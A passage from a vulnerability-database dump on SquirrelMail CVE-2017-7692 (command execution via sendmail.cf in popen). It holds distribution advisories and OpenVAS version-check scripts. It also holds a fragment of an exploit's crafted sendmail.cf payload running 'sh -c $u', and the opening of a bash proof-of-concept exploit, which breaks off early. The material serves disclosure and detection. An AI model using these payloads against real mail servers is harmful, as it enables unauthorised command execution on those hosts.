qualified\r\nR$+ $@ $1 < @ *LOCAL* > add local qualification\r\nMlocal, P=/bin/bash, F=lsDFMAw5:/|@qPn9S, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL,\r\n T=DNS/RFC822/X-Unix,\r\n A=X %s\r\nMprog, P=/bin/sh, F=lsDFMoqeu9, S=EnvFromL/HdrFromL, R=EnvToL/HdrToL, D=$z:/,\r\n T=X-Unix/X-Unix/X-Unix,\r\n A=sh -c $u\r\n\r\n\"\"\"\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv)\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-93005", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7692"], "description": "SquirrelMail is a basic webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. ", "modified": "2017-06-03T02:25:05", "published": "2017-06-03T02:25:05", "id": "FEDORA:70FB5602F586", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: squirrelmail-1.4.22-19.fc24", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7692"], "description": "SquirrelMail is a basic webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. ", "modified": "2017-06-03T02:37:03", "published": "2017-06-03T02:37:03", "id": "FEDORA:20BC26069BE6", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 25 Update: squirrelmail-1.4.22-19.fc25", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-12-21T08:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7692"], "description": "SquirrelMail is a basic webmail package written in PHP4. It includes built-in pure PHP support for the IMAP and SMTP protocols, and all pages render in pure HTML 4.0 (with no JavaScript) for maximum compatibility across browsers. It has very few requirements and is very easy to configure and install. ", "modified": "2017-06-09T19:36:12", "published": "2017-06-09T19:36:12", "id": "FEDORA:4913A60478E1", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: squirrelmail-1.4.22-19.fc26", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "gentoo": [{"lastseen": "2017-09-17T23:59:52", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7692"], "description": "### Background\n\nSquirrelMail is a webmail package written in PHP. It supports IMAP and SMTP and can optionally be installed with SQL support. \n\n### Description\n\nIt was discovered that the sendmail.cf file is mishandled in a popen call. \n\n### Impact\n\nA remote attacker, by enticing a user to open an e-mail attachment, could execute arbitrary shell commands. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nGentoo has discontinued support for SquirrelMail and recommends that users unmerge the package: \n \n \n # emerge --unmerge \"mail-client/squirrelmail\"", "edition": 1, "modified": "2017-09-17T00:00:00", "published": "2017-09-17T00:00:00", "href": "https://security.gentoo.org/glsa/201709-13", "id": "GLSA-201709-13", "title": "SquirrelMail: Remote Code Execution", "type": "gentoo", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:34:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-06-03T00:00:00", "id": "OPENVAS:1361412562310872735", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872735", "type": "openvas", "title": "Fedora Update for squirrelmail FEDORA-2017-f85c37ae3d", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for squirrelmail FEDORA-2017-f85c37ae3d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872735\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-03 07:04:44 +0200 (Sat, 03 Jun 2017)\");\n script_cve_id(\"CVE-2017-7692\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for squirrelmail FEDORA-2017-f85c37ae3d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'squirrelmail'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"squirrelmail on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-f85c37ae3d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UNTLMY5LPO22GYRCH3FBZ6YFBHUHXRHD\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"squirrelmail\", rpm:\"squirrelmail~1.4.22~19.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "description": "Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.", "modified": "2019-03-18T00:00:00", "published": "2017-05-13T00:00:00", "id": "OPENVAS:1361412562310703852", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703852", "type": "openvas", "title": "Debian Security Advisory DSA 3852-1 (squirrelmail - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3852.nasl 14280 2019-03-18 14:50:45Z cfischer $\n# Auto-generated from advisory DSA 3852-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703852\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-7692\");\n script_name(\"Debian Security Advisory DSA 3852-1 (squirrelmail - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-13 00:00:00 +0200 (Sat, 13 May 2017)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3852.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"squirrelmail on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this problem has been fixed in\nversion 2:1.4.23~svn20120406-2+deb8u1.\n\nWe recommend that you upgrade your squirrelmail packages.\");\n script_tag(name:\"summary\", value:\"Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"squirrelmail\", ver:\"2:1.4.23~svn20120406-2+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:57:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "description": "Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.", "modified": "2017-07-07T00:00:00", "published": "2017-05-13T00:00:00", "id": "OPENVAS:703852", "href": "http://plugins.openvas.org/nasl.php?oid=703852", "type": "openvas", "title": "Debian Security Advisory DSA 3852-1 (squirrelmail - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3852.nasl 6607 2017-07-07 12:04:25Z cfischer $\n# Auto-generated from advisory DSA 3852-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703852);\n script_version(\"$Revision: 6607 $\");\n script_cve_id(\"CVE-2017-7692\");\n script_name(\"Debian Security Advisory DSA 3852-1 (squirrelmail - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:04:25 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2017-05-13 00:00:00 +0200 (Sat, 13 May 2017)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2017/dsa-3852.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"squirrelmail on Debian Linux\");\n script_tag(name: \"insight\", value: \"SquirrelMail is a standards-based webmail package written in PHP. It\nincludes built-in pure PHP support for the IMAP and SMTP protocols, and\nis designed for maximum compatibility across browsers. SquirrelMail has\nfew requirements and is easy to configure and install. It runs on top of\nany IMAP server.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie), this problem has been fixed in\nversion 2:1.4.23~svn20120406-2+deb8u1.\n\nWe recommend that you upgrade your squirrelmail packages.\");\n script_tag(name: \"summary\", value: \"Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"squirrelmail\", ver:\"2:1.4.23~svn20120406-2+deb8u1\", rls_regex:\"DEB8.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:34:20", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-06-03T00:00:00", "id": "OPENVAS:1361412562310872733", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872733", "type": "openvas", "title": "Fedora Update for squirrelmail FEDORA-2017-0b6da97aa5", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for squirrelmail FEDORA-2017-0b6da97aa5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872733\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-06-03 07:04:06 +0200 (Sat, 03 Jun 2017)\");\n script_cve_id(\"CVE-2017-7692\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for squirrelmail FEDORA-2017-0b6da97aa5\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'squirrelmail'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"squirrelmail on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-0b6da97aa5\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AFXDNLFX6XYCTBMHOMFBRMMSCSJV6VAE\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"squirrelmail\", rpm:\"squirrelmail~1.4.22~19.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-01-29T20:09:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7692"], "description": "Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.", "modified": "2020-01-29T00:00:00", "published": "2018-01-25T00:00:00", "id": "OPENVAS:1361412562310890941", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310890941", "type": "openvas", "title": "Debian LTS: Security Advisory for squirrelmail (DLA-941-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.890941\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2017-7692\");\n script_name(\"Debian LTS: Security Advisory for squirrelmail (DLA-941-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-01-25 00:00:00 +0100 (Thu, 25 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/05/msg00012.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n\n script_tag(name:\"affected\", value:\"squirrelmail on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n2:1.4.23~svn20120406-2+deb7u1.\n\nWe recommend that you upgrade your squirrelmail packages.\");\n\n script_tag(name:\"summary\", value:\"Dawid Golunski and Filippo Cavallarin discovered that squirrelmail, a\nwebmail application, incorrectly handled a user-supplied value. This\nwould allow a logged-in user to run arbitrary commands on the server.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"squirrelmail\", ver:\"2:1.4.23~svn20120406-2+deb7u1\", rls:\"DEB7\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8741", "CVE-2017-7692"], "description": "SquirrelMail is prone to authenticated remote code execution\n and directory traversal vulnerabilities.", "modified": "2019-03-07T00:00:00", "published": "2017-04-21T00:00:00", "id": "OPENVAS:1361412562310106785", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106785", "type": "openvas", "title": "SquirrelMail < 1.4.23 Multiple Vulnerabilities", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_squirrelmail_rce_vuln.nasl 14033 2019-03-07 11:09:35Z cfischer $\n#\n# SquirrelMail < 1.4.23 Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:squirrelmail:squirrelmail';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106785\");\n script_version(\"$Revision: 14033 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-07 12:09:35 +0100 (Thu, 07 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-21 17:09:27 +0200 (Fri, 21 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-7692\", \"CVE-2018-8741\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"Workaround\");\n\n script_name(\"SquirrelMail < 1.4.23 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"squirrelmail_detect.nasl\");\n script_mandatory_keys(\"squirrelmail/installed\");\n\n script_tag(name:\"summary\", value:\"SquirrelMail is prone to authenticated remote code execution\n and directory traversal vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"SquirrelMail allows:\n\n - post-authentication remote code execution via a sendmail.cf file that is mishandled in a popen call.\n It's possible to exploit this vulnerability to execute arbitrary shell commands on the remote server.\n\n - uploading a mail attachment a temporary file is generated on the server that the client later references\n when sending the mail. The filename is not sanitized in any way, so by passing a filename of the form\n '../../../../some_path/some_filename' one can use this to attach arbitrary files from the server that can\n be accessed by the PHP process to a mail.\");\n\n script_tag(name:\"impact\", value:\"An authenticated attacker may execute arbitrary shell commands or\n read files from the filesystem.\");\n\n script_tag(name:\"affected\", value:\"SquirrelMail 1.4.22 and prior as well as the trunk version\n (before r14650).\");\n\n script_tag(name:\"solution\", value:\"Source-Code patches for both issues are available in the linked references.\");\n\n script_xref(name:\"URL\", value:\"https://www.wearesegment.com/research/Squirrelmail-Remote-Code-Execution.html\");\n script_xref(name:\"URL\", value:\"https://insinuator.net/2018/03/squirrelmail-full-disclosure-troopers18/\");\n script_xref(name:\"URL\", value:\"https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html\");\n script_xref(name:\"URL\", value:\"https://gist.github.com/hannob/3c4f86863c418930ad08853c1109364e\");\n script_xref(name:\"URL\", value:\"https://sourceforge.net/p/squirrelmail/code/14650/\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less_equal(version: version, test_version: \"1.4.22\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See reference\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSquirrelMail 1.4.22 - Remote Code Execution", "edition": 1, "published": "2017-04-23T00:00:00", "title": "SquirrelMail 1.4.22 - Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7692"], "modified": "2017-04-23T00:00:00", "id": "EXPLOITPACK:5A207B9957580AC118ED163D0FEC5A56", "href": "", "sourceData": "#!/bin/bash\n#\nint='\\033[94m\n __ __ __ __ __ \n / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________\n / / / _ \\/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \\/ ___/ ___/\n / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ ) \n /_____/\\___/\\__, /\\__,_/_/ /_/ /_/\\__,_/\\___/_/|_|\\___/_/ /____/ \n /____/ \n\nSquirrelMail <= 1.4.23 Remote Code Execution PoC Exploit (CVE-2017-7692)\n\nSquirrelMail_RCE_exploit.sh (ver. 1.1)\n\nDiscovered and coded by \n\nDawid Golunski (@dawid_golunski)\nhttps://legalhackers.com\n\nExploitBox project:\nhttps://ExploitBox.io\n\n\\033[0m'\n\n# Quick and messy PoC for SquirrelMail webmail application.\n# It contains payloads for 2 vectors:\n# * File Write\n# * RCE \n# It requires user credentials and that SquirrelMail uses \n# Sendmail method as email delivery transport\n#\n#\n# Full advisory URL:\n# https://legalhackers.com/advisories/SquirrelMail-Exploit-Remote-Code-Exec-CVE-2017-7692-Vuln.html\n# Exploit URL:\n# https://legalhackers.com/exploits/CVE-2017-7692/SquirrelMail_RCE_exploit.sh\n#\n# Tested on: # Ubuntu 16.04 \n# squirrelmail package version:\n# 2:1.4.23~svn20120406-2ubuntu1.16.04.1 \n#\n# Disclaimer:\n# For testing purposes only\n#\n#\n# -----------------------------------------------------------------\n#\n# Interested in vulns/exploitation? \n# Stay tuned for my new project - ExploitBox\n# \n# .;lc' \n# .,cdkkOOOko;. \n# .,lxxkkkkOOOO000Ol' \n# .':oxxxxxkkkkOOOO0000KK0x:' \n# .;ldxxxxxxxxkxl,.'lk0000KKKXXXKd;. \n# ':oxxxxxxxxxxo;. .:oOKKKXXXNNNNOl. \n# '';ldxxxxxdc,. ,oOXXXNNNXd;,. \n# .ddc;,,:c;. ,c: .cxxc:;:ox: \n# .dxxxxo, ., ,kMMM0:. ., .lxxxxx: \n# .dxxxxxc lW. oMMMMMMMK d0 .xxxxxx: \n# .dxxxxxc .0k.,KWMMMWNo :X: .xxxxxx: \n# .dxxxxxc .xN0xxxxxxxkXK, .xxxxxx: \n# .dxxxxxc lddOMMMMWd0MMMMKddd. .xxxxxx: \n# .dxxxxxc .cNMMMN.oMMMMx' .xxxxxx: \n# .dxxxxxc lKo;dNMN.oMM0;:Ok. 'xxxxxx: \n# .dxxxxxc ;Mc .lx.:o, Kl 'xxxxxx: \n# .dxxxxxdl;. ., .. .;cdxxxxxx: \n# .dxxxxxxxxxdc,. 'cdkkxxxxxxxx: \n# .':oxxxxxxxxxdl;. .;lxkkkkkxxxxdc,. \n# .;ldxxxxxxxxxdc, .cxkkkkkkkkkxd:. \n# .':oxxxxxxxxx.ckkkkkkkkxl,. \n# .,cdxxxxx.ckkkkkxc. \n# .':odx.ckxl,. \n# .,.'. \n#\n# https://ExploitBox.io\n#\n# https://twitter.com/Exploit_Box\n#\n# -----------------------------------------------------------------\n\nsqspool=\"/var/spool/squirrelmail/attach/\"\n\necho -e \"$int\"\n#echo -e \"\\033[94m \\nSquirrelMail - Remote Code Execution PoC 